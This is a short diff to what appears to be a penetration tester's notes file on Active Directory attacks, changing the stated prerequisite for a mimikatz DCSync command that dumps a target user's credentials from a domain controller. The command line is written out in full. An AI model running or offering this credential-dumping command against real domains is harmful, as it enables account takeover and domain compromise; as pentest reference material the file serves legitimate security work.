ThomasBucaioni/pentools/microsoft/adattack.md

 #### From Windows

-From a local admin account (for example):
+From an account with _Replicating Directory Changes_ rights:
 ```
 PS > c:\path\to\mimikatz.exe
 mimikatz # lsadump::dcsync /user:mydomainname\target_username